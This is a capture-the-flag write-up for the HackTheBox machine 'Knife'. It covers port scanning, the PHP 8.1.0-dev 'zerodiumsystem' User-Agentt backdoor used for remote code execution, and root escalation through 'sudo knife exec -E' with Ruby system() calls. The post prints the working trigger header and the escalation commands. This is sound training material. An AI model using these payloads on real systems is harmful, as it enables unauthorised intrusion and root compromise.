Dear readers,
Today’s post is on Knife, a HackTheBox easy machine that is based on GNU/Linux. It was created on 24th May 2021. This machine is mostly about finding a CVE-liked vulnerability in the web application and using Knife for privilege escalation. Let’s get started!
Tools required
If you are using OS such as Kali, Parrot, or Black Arch, these tools should already be preinstalled.
Enumeration
As we are only presented with the IP address, we 1st have to do port scanning to find out open ports are there and the services available. Below shows the result where only 2 ports are open in the 1st 1000 ports scanned. You may scan more but they should be closed.
┌──(root💀kali)-[/home/soulx] └─# nmap -Pn -sV -v -n -p1-1000 10.10.10.242 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-28 18:29 +08 NSE: Loaded 45 scripts for scanning. Initiating SYN Stealth Scan at 18:29 Scanning 10.10.10.242 [1000 ports] Discovered open port 80/tcp on 10.10.10.242 Discovered open port 22/tcp on 10.10.10.242 Completed SYN Stealth Scan at 18:30, 18.09s elapsed (1000 total ports) Initiating Service scan at 18:30 Scanning 2 services on 10.10.10.242 Completed Service scan at 18:30, 6.16s elapsed (2 services on 1 host) NSE: Script scanning 10.10.10.242. Initiating NSE at 18:30 Completed NSE at 18:30, 0.36s elapsed Initiating NSE at 18:30 Completed NSE at 18:30, 0.32s elapsed Nmap scan report for 10.10.10.242 Host is up (2.5s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.62 seconds Raw packets sent: 1113 (48.972KB) | Rcvd: 1080 (43.208KB)
Based on the Nmap result, the server is indeed a GNU/Linux server. 2 ports, SSH and web server, can be seen opened on ports 22 and 80 respectively.
Let’s try to access the website.
Outlook of the website
The website contains only a little text and an image. The navigation tabs on the top right-hand corner are not real as they are just text, thus unclickable.
Vulnerability discovered and get the user flag
When we open up the network tab in the inspect element (press key F12), refresh the webpage and we will be able to see the response header we received from the web server. Based on the response header, we can see that it uses PHP 8.1.0-dev which contains a backdoor.
Just a quick google on PHP 8.1.0-dev, I was able to find an exploit on ExploitDB here. Looking at the source code, we can easily understand that the backdoor is accessed when we include User-Agentt with zerodiumsystem(<system command>) that allows remote code execution (RCE).
Just by running the exploit, we can easily read the files in the system, locate the user flag, and print out the user flag.
┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/Knife] └─$ python3 ./exploit.py Enter the full host url: http://10.10.10.242/ Interactive shell is opened on http://10.10.10.242/ Can't acces tty; job crontol turned off. $ ls bin boot cdrom dev etc home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin snap srv sys tmp usr var $ ls home james $ ls home/james shell.rb user.txt $ cat home/james/user.txt 8d3*****************************
Getting the root flag
After obtaining the user flag, we next would like to escalate our privileges to the system level. Therefore, we can 1st run sudo -l command using the exploit to see what files the current user, james, can run as sudo/root. This may give us a hint on what file(s) to exploit so that we will have root/system access.
$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
We can see that the user, james, can run a tool call Knife. Executing the tool Knife, we can see the following documentation on how to use the tool.
$ sudo knife ERROR: You need to pass a sub-command (e.g., knife SUB-COMMAND) Usage: knife sub-command (options) -s, --server-url URL Chef Infra Server URL. --chef-zero-host HOST Host to start Chef Infra Zero on. --chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works. -k, --key KEY Chef Infra Server API client key. --[no-]color Use colored output, defaults to enabled. -c, --config CONFIG The configuration file to use. --config-option OPTION=VALUE Override a single configuration option. --defaults Accept default values for all questions. -d, --disable-editing Do not open EDITOR, just accept the data as is. -e, --editor EDITOR Set the editor to use for interactive commands. -E, --environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored). --[no-]fips Enable FIPS mode. -F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp') --[no-]listen Whether a local mode (-z) server binds to a port. -z, --local-mode Point knife commands at local repository instead of Chef Infra Server. -u, --user USER Chef Infra Server API client username. --print-after Show the data after a destructive operation. --profile PROFILE The credentials profile to select. -V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity. -v, --version Show Chef Infra Client version. -y, --yes Say yes to all prompts for confirmation. -h, --help Show this help message. Available subcommands: (for details, knife SUB-COMMAND --help) ** CHEF ORGANIZATION MANAGEMENT COMMANDS ** knife opc org create ORG_SHORT_NAME ORG_FULL_NAME (options) knife opc org delete ORG_NAME knife opc org edit ORG knife opc org list knife opc org show ORGNAME knife opc org user add ORG_NAME USER_NAME knife opc org user remove ORG_NAME USER_NAME knife opc user create USERNAME FIRST_NAME [MIDDLE_NAME] LAST_NAME EMAIL PASSWORD knife opc user delete USERNAME [-d] [-R] knife opc user edit USERNAME knife opc user list knife opc user password USERNAME [PASSWORD | --enable-external-auth] knife opc user show USERNAME ** ACL COMMANDS ** knife acl add MEMBER_TYPE MEMBER_NAME OBJECT_TYPE OBJECT_NAME PERMS knife acl bulk add MEMBER_TYPE MEMBER_NAME OBJECT_TYPE REGEX PERMS knife acl bulk remove MEMBER_TYPE MEMBER_NAME OBJECT_TYPE REGEX PERMS knife acl remove MEMBER_TYPE MEMBER_NAME OBJECT_TYPE OBJECT_NAME PERMS knife acl show OBJECT_TYPE OBJECT_NAME ** AZURE COMMANDS ** knife azure ag create (options) knife azure ag list (options) knife azure image list (options) knife azure internal lb create (options) knife azure internal lb list (options) knife azure server create (options) knife azure server delete SERVER [SERVER] (options) knife azure server list (options) knife azure server show SERVER [SERVER] knife azure vnet create (options) knife azure vnet list (options) ** AZURERM COMMANDS ** knife azurerm server create (options) knife azurerm server delete SERVER [SERVER] (options) knife azurerm server list (options) knife azurerm server show SERVER (options) ** BASE COMMANDS ** Usage: /usr/bin/knife (options) ** BOOTSTRAP COMMANDS ** knife bootstrap [PROTOCOL://][USER@]FQDN (options) knife bootstrap azure SERVER (options) knife bootstrap azurerm SERVER (options) Usage: /usr/bin/knife (options) knife bootstrap windows ssh FQDN (options) DEPRECATED knife bootstrap windows winrm FQDN (options) DEPRECATED ** CLIENT COMMANDS ** knife client bulk delete REGEX (options) knife client create CLIENTNAME (options) knife client delete [CLIENT [CLIENT]] (options) knife client edit CLIENT (options) knife client key create CLIENT (options) knife client key delete CLIENT KEYNAME (options) knife client key edit CLIENT KEYNAME (options) knife client key list CLIENT (options) knife client key show CLIENT KEYNAME (options) knife client list (options) knife client reregister CLIENT (options) knife client show CLIENT (options) ** COMMAND COMMANDS ** Usage: /usr/bin/knife (options) ** CONFIG COMMANDS ** knife config list (options) knife config show [OPTION...] (options) Displays the value of Chef::Config[OPTION] (or all config values) knife config use [PROFILE] ** CONFIGURE COMMANDS ** knife configure (options) knife configure client DIRECTORY ** COOKBOOK COMMANDS ** knife cookbook bulk delete REGEX (options) knife cookbook delete COOKBOOK VERSION (options) knife cookbook download COOKBOOK [VERSION] (options) knife cookbook list (options) knife cookbook metadata COOKBOOK (options) knife cookbook metadata from file FILE (options) knife cookbook show COOKBOOK [VERSION] [PART] [FILENAME] (options) knife cookbook upload [COOKBOOKS...] (options) ** DATA BAG COMMANDS ** knife data bag create BAG [ITEM] (options) knife data bag delete BAG [ITEM] (options) knife data bag edit BAG ITEM (options) knife data bag from file BAG FILE|FOLDER [FILE|FOLDER..] (options) knife data bag list (options) knife data bag show BAG [ITEM] (options) ** EC2 COMMANDS ** knife ec2 ami list (options) knife ec2 eni list (options) knife ec2 flavor list (options) [DEPRECATED] knife ec2 securitygroup list (options) knife ec2 server create (options) knife ec2 server delete SERVER [SERVER] (options) knife ec2 server list (options) knife ec2 subnet list (options) knife ec2 vpc list (options) ** ENVIRONMENT COMMANDS ** knife environment compare [ENVIRONMENT..] (options) knife environment create ENVIRONMENT (options) knife environment delete ENVIRONMENT (options) knife environment edit ENVIRONMENT (options) knife environment from file FILE [FILE..] (options) knife environment list (options) knife environment show ENVIRONMENT (options) ** EXEC COMMANDS ** knife exec [SCRIPT] (options) ** GOOGLE COMMANDS ** knife google disk create NAME --gce-disk-size N (options) knife google disk delete NAME [NAME] (options) knife google disk list knife google image list knife google project quotas knife google region list knife google region quotas knife google server create NAME -m MACHINE_TYPE -I IMAGE (options) knife google server delete INSTANCE_NAME [INSTANCE_NAME] (options) knife google server list knife google server show INSTANCE_NAME (options) knife google zone list ** GROUP COMMANDS ** knife group add MEMBER_TYPE MEMBER_NAME GROUP_NAME knife group create GROUP_NAME knife group destroy GROUP_NAME knife group list knife group remove MEMBER_TYPE MEMBER_NAME GROUP_NAME knife group show GROUP_NAME ** KNIFE COMMANDS ** Usage: /usr/bin/knife (options) ** NODE COMMANDS ** knife node bulk delete REGEX (options) knife node create NODE (options) knife node delete [NODE [NODE]] (options) knife node edit NODE (options) knife node environment set NODE ENVIRONMENT knife node from file FILE (options) knife node list (options) knife node policy set NODE POLICY_GROUP POLICY_NAME (options) knife node run_list add [NODE] [ENTRY [ENTRY]] (options) knife node run_list remove [NODE] [ENTRY [ENTRY]] (options) knife node run_list set NODE ENTRIES (options) knife node show NODE (options) ** PATH-BASED COMMANDS ** knife delete [PATTERN1 ... PATTERNn] knife deps PATTERN1 [PATTERNn] knife diff PATTERNS knife download PATTERNS knife edit [PATTERN1 ... PATTERNn] knife list [-dfR1p] [PATTERN1 ... PATTERNn] (options) knife show [PATTERN1 ... PATTERNn] (options) knife upload PATTERNS (options) knife xargs [COMMAND] (options) ** RAW COMMANDS ** knife raw REQUEST_PATH (options) ** RECIPE COMMANDS ** knife recipe list [PATTERN] ** REHASH COMMANDS ** knife rehash ** RESOURCE COMMANDS ** Usage: /usr/bin/knife (options) ** ROLE COMMANDS ** knife role bulk delete REGEX (options) knife role create ROLE (options) knife role delete ROLE (options) knife role edit ROLE (options) knife role env_run_list add [ROLE] [ENVIRONMENT] [ENTRY [ENTRY]] (options) knife role env_run_list clear [ROLE] [ENVIRONMENT] (options) knife role env_run_list remove [ROLE] [ENVIRONMENT] [ENTRIES] (options) knife role env_run_list replace [ROLE] [ENVIRONMENT] [OLD_ENTRY] [NEW_ENTRY] (options) knife role env_run_list set [ROLE] [ENVIRONMENT] [ENTRIES] (options) knife role from file FILE [FILE..] (options) knife role list (options) knife role run_list add [ROLE] [ENTRY [ENTRY]] (options) knife role run_list clear [ROLE] (options) knife role run_list remove [ROLE] [ENTRY] (options) knife role run_list replace [ROLE] [OLD_ENTRY] [NEW_ENTRY] (options) knife role run_list set [ROLE] [ENTRIES] (options) knife role show ROLE (options) ** SEARCH COMMANDS ** knife search INDEX QUERY (options) ** SERVE COMMANDS ** knife serve (options) ** SERVER COMMANDS ** Usage: /usr/bin/knife (options) Usage: /usr/bin/knife (options) Usage: /usr/bin/knife (options) Usage: /usr/bin/knife (options) ** SSH COMMANDS ** knife ssh QUERY COMMAND (options) ** SSL COMMANDS ** knife ssl check [URL] (options) knife ssl fetch [URL] (options) ** STATUS COMMANDS ** knife status QUERY (options) ** SUPERMARKET COMMANDS ** knife supermarket download COOKBOOK [VERSION] (options) knife supermarket install COOKBOOK [VERSION] (options) knife supermarket list (options) knife supermarket search QUERY (options) knife supermarket share COOKBOOK [CATEGORY] (options) knife supermarket show COOKBOOK [VERSION] (options) knife supermarket unshare COOKBOOK ** TAG COMMANDS ** knife tag create NODE TAG ... knife tag delete NODE TAG ... knife tag list NODE ** TIDY COMMANDS ** knife tidy backup clean (options) knife tidy notify (options) knife tidy server clean (options) knife tidy server report (options) ** USER COMMANDS ** knife user create USERNAME DISPLAY_NAME FIRST_NAME LAST_NAME EMAIL PASSWORD (options) knife user delete USER (options) knife user dissociate USERNAMES knife user edit USER (options) knife user invite add USERNAMES knife user invite list knife user invite rescind [USERNAMES] (options) knife user key create USER (options) knife user key delete USER KEYNAME (options) knife user key edit USER KEYNAME (options) knife user key list USER (options) knife user key show USER KEYNAME (options) knife user list (options) knife user reregister USER (options) knife user show USER (options) ** VAULT COMMANDS ** knife vault create VAULT ITEM VALUES (options) knife vault delete VAULT ITEM (options) knife vault download VAULT ITEM PATH (options) knife vault edit VAULT ITEM (options) knife vault isvault VAULT ITEM (options) knife vault itemtype VAULT ITEM (options) knife vault list (options) knife vault refresh VAULT ITEM knife vault remove VAULT ITEM VALUES (options) knife vault rotate all keys knife vault rotate keys VAULT ITEM (options) knife vault show VAULT [ITEM] [VALUES] (options) knife vault update VAULT ITEM VALUES (options) ** VCENTER COMMANDS ** knife vcenter cluster list knife vcenter datacenter list knife vcenter host list knife vcenter vm clone NAME (options) knife vcenter vm create NAME knife vcenter vm delete NAME [NAME] (options) knife vcenter vm list knife vcenter vm show NAME (options) ** VSPHERE COMMANDS ** knife vsphere cluster list knife vsphere cpu ratio [CLUSTER] [HOST] knife vsphere customization list knife vsphere datastore file knife vsphere datastore list knife vsphere datastore maxfree knife vsphere datastorecluster list knife vsphere datastorecluster maxfree knife vsphere folder list knife vsphere hosts list knife vsphere pool list knife vsphere pool query POOLNAME QUERY. See "https://pubs.vmware.com/vi3/sdk/ReferenceGuide/vim.ComputeResource.html" for allowed QUERY values. knife vsphere pool show POOLNAME QUERY. See "https://pubs.vmware.com/vi3/sdk/ReferenceGuide/vim.ComputeResource.html" for allowed QUERY values. knife vsphere template list knife vsphere vlan create NAME VID knife vsphere vlan list knife vsphere vm cdrom VMNAME (options) knife vsphere vm clone VMNAME (options) knife vsphere vm config VMNAME PROPERTY VALUE (PROPERTY VALUE)... See "https://www.vmware.com/support/developer/converter-sdk/conv60_apireference/vim.vm.ConfigSpec.html" for allowed ATTRIBUTE values (any property of type xs:string is supported). knife vsphere vm delete VMNAME (options) knife vsphere vm disk extend VMNAME SIZE. Extends the disk of vm VMNAME to SIZE kilobytes. knife vsphere vm disk list VMNAME knife vsphere vm execute VMNAME COMMAND ARGS knife vsphere vm find knife vsphere vm list knife vsphere vm markastemplate VMNAME knife vsphere vm migrate VMNAME (options) knife vsphere vm move VMNAME knife vsphere vm net STATE VMNAME knife vsphere vm network add VMNAME NETWORKNAME knife vsphere vm network delete VMNAME NICNAME knife vsphere vm network list VMNAME knife vsphere vm network set VMNAME NETWORKNAME knife vsphere vm property get VMNAME PROPERTY. Gets a vApp Property on VMNAME. knife vsphere vm property set VMNAME PROPERTY VALUE. Sets a vApp Property on VMNAME. knife vsphere vm show VMNAME QUERY. See "https://pubs.vmware.com/vi3/sdk/ReferenceGuide/vim.VirtualMachine.html" for allowed QUERY values. knife vsphere vm snapshot VMNAME (options) knife vsphere vm state VMNAME (options) knife vsphere vm toolsconfig VMNAME PROPERTY VALUE See "https://www.vmware.com/support/developer/vc-sdk/visdk25pubs/ReferenceGuide/vim.vm.ToolsConfigInfo.html" for available properties and types. knife vsphere vm vmdk add VMNAME DISK_GB knife vsphere vm vncset VMNAME knife vsphere vm wait sysprep VMNAME (options) ** WINDOWS COMMANDS ** knife windows cert generate FILE_PATH (options) knife windows cert install CERT [CERT] (options) knife windows listener create (options) ** WINRM COMMANDS ** knife winrm QUERY COMMAND (options) ** WSMAN COMMANDS ** knife wsman test QUERY (options) ** YAML COMMANDS ** knife yaml convert YAML_FILENAME [RUBY_FILENAME]
Based on the documentation give, I found a really interesting option which I have made into a cyan font. It is the exec option. If we look at the documentation of exec here, we can see that adding the -E option will allow us to execute Ruby code.
-E CODE, --exec CODE A string of code to be executed.
If we google for the function to execute system command in Ruby, it is:
system("<command>")
Since Knife can be run as sudo/root, the Ruby code in Knife will be executed with system privileges and thus system commands will be in system privileges as well.
Therefore, we can craft a command to reveal the root directory by executing in the exploit we previously used to get our user flag.
$ sudo knife exec -E 'system(\"ls /root\")'
No input file specified.
However, noticed an error appears? This is probably due to the double quotes issue when parsing in the string used to construct the exploit that we obtained from ExploitDB. Therefore, we can use Burpsuite instead.
Firstly, launch Burpsuite and open up the inbuilt browser. Try to access the website at http://10.10.10.242. The request will be intercepted. Make sure the request is to 10.10.10.242:80 and not some other website. Sometimes some requests to Google or other websites will be made before accessing the website we requested. If it is not our actual request, just press the Forward button until you see our actual request.
Once the correct request is intercepted, right-click and select “Send to Repeater” before going to the Repeater tab (see Fig 6b).
User-Agentt: zerodiumsystem("sudo knife exec -E 'system(\"ls root\")'");
Finally, we can print out the content of root.txt to get the flag (see Fig 6d).
I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my milk tea addiction. The link is here. 🙂
Lamecarrot 